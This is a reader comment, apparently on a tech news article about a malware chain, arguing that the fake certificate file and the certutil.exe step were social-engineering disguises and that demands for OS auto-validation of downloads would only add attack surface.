Social engineering as part of the exe chain?
As I read the article, I think you have just fallen into a trap the bad guys set:
"There is a certificate involved, blame the OS for not protecting you"
or similar feelings expressed about the use of a JPEG...
The "certificate" was just used as a wrapper, so that if you spotted the download you'd not be suspicious. Then you'd see certutil.exe run: ok, what else would you use with a certificate? But it was just used to extract the next link in the chain.
(Similarly, the JPEG, abused to innocently carry a link in the chain)
At no point is the "certificate" intended to be handed 'properly' to the OS and hence, as you hoped, be validated: to the OS it is just another piece of downloaded stuff.
Now, you *could* demand that the OS examine every bit of data and validate it before letting any other process access it: now you have either invented the malware scanner or have effectively switched on autorun for everything that is ever downloaded (because you know full well that, for example, detecting that a file is "a certificate" and then running some autovalidation on it means another vulnerability will be found and the fake certs designed to exploit that).
But because of your reaction to the fact one link used a certificate, the bad guys now have you wasting time and energy talking about that - and, who knows, enough people follow suit and pressure OS writers, who add in the autorun scenario "as an extra precaution" (aka to be seen to be doing something) and bingo, attack surfaces grow and grow...
Biting the hand that feeds IT
